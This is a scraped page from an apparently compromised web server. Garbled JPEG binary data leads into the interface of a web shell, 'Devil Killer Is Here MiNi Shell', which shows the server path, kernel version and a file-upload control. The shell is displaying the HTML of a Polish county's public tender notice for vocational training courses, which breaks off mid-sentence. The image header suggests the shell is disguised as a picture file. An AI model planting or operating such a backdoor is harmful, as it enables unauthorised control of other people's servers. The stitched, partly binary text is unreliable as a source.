JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250402/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250402/0017427501-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Usługa przeprowadzenia szkoleń i kursów dla osób młodych, osób dorosłych oraz nauczycieli </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Powiat Wałecki</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 570799533</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">J. Dąbrowskiego 17</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Wałcz</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">78-600</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">zachodniopomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL427 - Szczecinecko-pyrzycki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">67 250 8451</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">kancelaria@powiatwalecki.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.powiatwalecki.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Usługa przeprowadzenia szkoleń i kursów dla osób młodych, osób dorosłych oraz nauczycieli </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-38b5d544-1eda-4c05-84da-27e8faff73cc</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00174275</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-04-02</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00023792/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Usługi szkoleń i kursów zawodowych w ramach funkcjonowania Branżowego Centrum Umiejętności</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Utworzenie i wsparcie funkcjonowania 120 branżowych centrów umiejętności (BCU), realizujących koncepcję centrów doskonałości zawodowej (CoVEs)” – konkurs uzupełniający </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/powiatwalecki <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie zamówienia publicznego komunikacja zamawiającego z wykonawcami odbywa się przy użyciu środków komunikacji elektronicznej, za pośrednictwem Platformy zakupowej, działającej pod adresem https://platformazakupowa.pl/pn/powiatwalecki.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia musi przed rozpoczęciem składania oferty zalogować się do systemu (https://platformazakupowa.pl), a jeżeli nie posiada konta, założyć bezpłatne konto. W przeciwnym wypadku wykonawca będzie miał ograniczone funkcjonalności, np. brak widoku wiadomości prywatnych od Zamawiającego w systemie lub wycofania oferty bez kontaktu z Centrum Wsparcia Klienta.<br/>Wykonawca może dołączyć maksymalnie 10 załączników (jest to suma plików dodanych w obu punktach: Oferta/Wniosek Wykonawcy oraz Tajemnica przedsiębiorstwa), o maksymalnym rozmiarze 150MB każdy.<br/>Szczegółowe informacje dotyczące sposobu komunikowania się Zamawiającego z Wykonawcami zawarte są w „Instrukcji dla Wykonawców platformazakupowa.pl” oraz „Regulamin platformazakupowa.pl dla Użytkowników (Wykonawców)”.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">IZ.272.5.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">14</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 1: Szkolenie z zakresu posługiwania się rysunkiem technicznym (dla osób młodych)<br/>a) Czas trwania: 40 godz.<br/>b) Forma zajęć: stacjonarnie, zajęcia teoretyczne oraz zajęcia praktyczne <br/>c) Miejsce realizacji: Wałcz<br/>d) Liczba uczestników: 10 osób<br/>e) Liczba edycji szkolenia: 1<br/>f) Terminy realizacji szkolenia: do dnia 30 września 2025 r.<br/>g) Program szkolenia powinien obejmować m.in. następujące zagadnienia: podstawy rysunku; linie rysunkowe; rzutowanie; wymiarowanie i szkic; rysunek wykonawczy oraz złożeniowy; podstawy poruszania się w AUTO-CAD. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80000000-4 - Usługi edukacyjne i szkoleniowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-09-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">70</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie wykładowcy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 2: Monter rusztowań budowlano – montażowych metalowych – montaż i demontaż (dla osób młodych)<br/>a) Czas trwania: 80 godz. <br/>b) Forma zajęć: stacjonarnie, zajęcia teoretyczne oraz zajęcia praktyczne <br/>c) Miejsce realizacji: Wałcz<br/>d) Liczba uczestników: 10 osób<br/>e) Liczba edycji szkolenia: 1<br/>f) Terminy realizacji szkolenia: do dnia 31 października 2025 r. <br/>g) Program szkolenia musi być realizowany zgodnie z programem nauczania w specjalności rusztowania budowlano – montażowe metalowe – montaż i demontaż zatwierdzonym przez Sieć Badawcza Łukasiewicz Warszawski Instytut Technologiczny (dawniej Instytut Mechanizacji Budownictwa i Górnictwa Skalnego)<br/>h) Uczestnik szkolenia otrzyma na własność odzież roboczą (spodnie robocze, koszula robocza, buty robocze niskie, kask, kamizelka)<br/>i) Szkolenie zakończy się sprawdzianem przed komisją powołaną przez Sieć Badawczą ŁUKASIEWICZ – Warszawski Instytut Technologiczny w celu potwierdzenia kwalifikacji zgodnie z rozporządzeniem Ministra Gospodarki z dnia 20 września 2001 r. w sprawie bezpieczeństwa i higieny pracy podczas eksploatacji maszyn i innych urządzeń technicznych do robót ziemnych, budowlanych i drogowych (z późniejszymi zmianami).<br/>j) Po pozytywnym wyniku sprawdzianu Uczestnicy/czki otrzymają książkę operatora oraz świadectwo.<br/>k) O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy posiadają potwierdzenie spełnienie wymagań, o których mowa w § 25 Rozporządzenia Ministra Gospodarki z dnia <br/>20 września 2001 r. w sprawie bezpieczeństwa i higieny pracy podczas eksploatacji maszyn <br/>i innych urządzeń technicznych do robót ziemnych, budowlanych i drogowych (z późniejszymi zmianami). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80000000-4 - Usługi edukacyjne i szkoleniowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-10-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">70</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie wykładowcy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 3: Szkolenie – uprawnienia elektryczne do 1 kV (dla osób młodych)<br/>a) Czas trwania: 15 godz. <br/>b) Forma zajęć: stacjonarnie, zajęcia teoretyczne<br/>c) Miejsce realizacji: Wałcz <br/>d) Liczba uczestników: 12 osób (3 grupy x 4 osoby).<br/>e) Liczba edycji szkolenia: 3<br/>f) Terminy realizacji szkolenia: <br/>I edycja – do dnia 30 czerwca 2025 r.<br/>II edycja – do dnia 30 września 2025 r. <br/>III edycja – do dnia 31 grudzień 2025 r. <br/>g) Program szkolenia powinien obejmować m.in. następujące zagadnienia: zasady budowy, działania oraz warunków technicznych obsługi urządzeń, instalacji i sieci; zasady eksploatacji urządzeń, instalacji i sieci; zasady i warunki wykonywania prac dotyczących obsługi, konserwacji, remontu, naprawy, montażu lub demontażu i czynności kontrolno-pomiarowych; zasady bezpieczeństwa i higieny pracy, ochrony przeciwpożarowej oraz udzielania pierwszej pomocy; zasady postępowania w razie awarii, pożaru lub innego zagrożenia bezpieczeństwa obsługi urządzeń lub zagrożenia życia, zdrowia i ochrony środowiska.<br/>h) Zakres kwalifikacji: na stanowisku eksploatacja.<br/>i) Szkolenie zakończy się egzaminem przeprowadzanym przez komisję powołaną przez Urząd Regulacji Energetyki – zgodnie z Rozporządzeniem Ministra Klimatu i Środowiska z dnia 1 lipca 2022 r. w sprawie szczegółowych zasad stwierdzania posiadania kwalifikacji przez osoby zajmujące się eksploatacją urządzeń, instalacji i sieci.<br/>j) Po pozytywnym wyniku egzaminu Uczestnik/czka otrzymuje świadectwo kwalifikacyjne według wzoru stanowiącego załącznik nr 3 do Rozporządzenia Ministra Klimatu i Środowiska z dnia 1 lipca 2022 r. w sprawie szczegółowych zasad stwierdzania posiadania kwalifikacji przez osoby zajmujące się eksploatacją urządzeń, instalacji i sieci. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80000000-4 - Usługi edukacyjne i szkoleniowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">70</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie wykładowcy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 4: Szkolenie operatorów urządzeń transportu bliskiego (dla osób młodych) <br/>Operator wózków jezdniowych podnośnikowych z mechanicznym napędem podnoszenia/ Operator podestów ruchomych przejezdnych<br/>a) Czas trwania: 37 godz. <br/>b) Forma zajęć: stacjonarnie, zajęcia teoretyczne oraz zajęcia praktyczne<br/>c) Miejsce realizacji: Wałcz<br/>d) Liczba uczestników: 40 osób (5 grup x 8 osób).<br/>e) Liczba edycji szkolenia: 5 <br/>f) Terminy realizacji szkolenia: <br/>I edycja – do dnia 30 czerwca 2025 r.<br/>II edycja – do dnia 30 września 2025 r.<br/>III edycja, IV edycja i V edycja – do dnia 31 grudnia 2025 r. <br/>Program szkolenia powinien obejmować m.in. następujące zagadnienia: znajomość przepisów prawnych w zakresie obsługi urządzeń; rodzaje urządzeń transportu bliskiego objęte zakresem uprawnienia; udźwig (charakterystyka udźwigu); pojęcie stateczności urządzenia; budowa urządzeń; mechanizmy oraz ich budowa i działanie; wyposażenie elektryczne, hydrauliczne, pneumatyczne; znajomość instrukcji eksploatacji w zakresie obsługi: czynności obsługującego przed przystąpieniem do pracy, w czasie pracy i po zakończeniu pracy, sterowanie mechanizmami urządzeń ogólnego przeznaczenia i specjalnych, sprawdzanie działania urządzeń zabezpieczających i hamulców itp.; niebezpieczne uszkodzenie / nieszczęśliwy wypadek – procedura postępowania; praca w specyficznych warunkach jak np.: praca zespołowa urządzeń, transport ładunku przez otwory w stropach, transport ludzi w koszu, praca w warunkach kolizyjnych, praca w pobliżu napowietrznych linii energetycznych i głębokich wykopów; zasady bezpiecznej eksploatacji wózków jezdniowych podnośnikowych zasilanych gazem (LPG); warunki bezpiecznej pracy przy obsłudze urządzeń.<br/>g) Szkolenie zakończy się egzaminem przed Urzędem Dozoru Technicznego w celu potwierdzenia kwalifikacji zgodnie z rozporządzeniem Ministra Przedsiębiorczości i Technologii z dnia 21 maja 2019 r. w sprawie sposobu i trybu sprawdzania kwalifikacji wymaganych przy obsłudze i konserwacji urządzeń technicznych oraz sposobu i trybu przedłużania okresu ważności zaświadczeń kwalifikacyjnych.<br/>h) Po pozytywnym wyniku egzaminu Uczestnik/czka otrzymuje zaświadczenie kwalifikacyjne zgodnie z rozporządzeniem Ministra Przedsiębiorczości i Technologii z dnia 21 maja 2019 r. w sprawie sposobu i trybu sprawdzania kwalifikacji wymaganych przy obsłudze i konserwacji urządzeń technicznych oraz sposobu i trybu przedłużania okresu ważności zaświadczeń kwalifikacyjnych. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80000000-4 - Usługi edukacyjne i szkoleniowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">70</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie wykładowcy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 5: Szkolenie operatorów urządzeń transportu bliskiego (dla osób dorosłych z wyłączeniem nauczycieli) Operator wózków jezdniowych podnośnikowych z mechanicznym napędem podnoszenia<br/>a) Czas trwania: 37 godz. <br/>b) Forma zajęć: stacjonarnie, zajęcia teoretyczne oraz zajęcia praktyczne<br/>c) Miejsce realizacji: Wałcz<br/>d) Liczba uczestników: 10 osób<br/>e) Liczba edycji szkolenia: 1<br/>f) Terminy realizacji szkolenia: do dnia 30 września 2025 r.<br/>g) Program szkolenia powinien obejmować m.in. następujące zagadnienia: znajomość przepisów prawnych w zakresie obsługi urządzeń; rodzaje urządzeń transportu bliskiego objęte zakresem uprawnienia; udźwig (charakterystyka udźwigu); pojęcie stateczności urządzenia; budowa urządzeń; mechanizmy oraz ich budowa i działanie; wyposażenie elektryczne, hydrauliczne, pneumatyczne; znajomość instrukcji eksploatacji w zakresie obsługi: czynności obsługującego przed przystąpieniem do pracy, w czasie pracy i po zakończeniu pracy, sterowanie mechanizmami urządzeń ogólnego przeznaczenia i specjalnych, sprawdzanie działania urządzeń zabezpieczających i hamulców itp.; niebezpieczne uszkodzenie / nieszczęśliwy wypadek – procedura postępowania; praca w specyficznych warunkach jak np.: praca zespołowa urządzeń, transport ładunku przez otwory w stropach, transport ludzi w koszu, praca w warunkach kolizyjnych, praca w pobliżu napowietrznych linii energetycznych i głębokich wykopów; zasady bezpiecznej eksploatacji wózków jezdniowych podnośnikowych zasilanych gazem (LPG); warunki bezpiecznej pracy przy obsłudze urządzeń.<br/>h) Szkolenie zakończy się egzaminem przed Urzędem Dozoru Technicznego w celu potwierdzenia kwalifikacji zgodnie z rozporządzeniem Ministra Przedsiębiorczości i Technologii z dnia 21 maja 2019 r. w sprawie sposobu i trybu sprawdzania kwalifikacji wymaganych przy obsłudze i konserwacji urządzeń technicznych oraz sposobu i trybu przedłużania okresu ważności zaświadczeń kwalifikacyjnych.<br/>i) Po pozytywnym wyniku egzaminu Uczestnik/czka otrzymuje 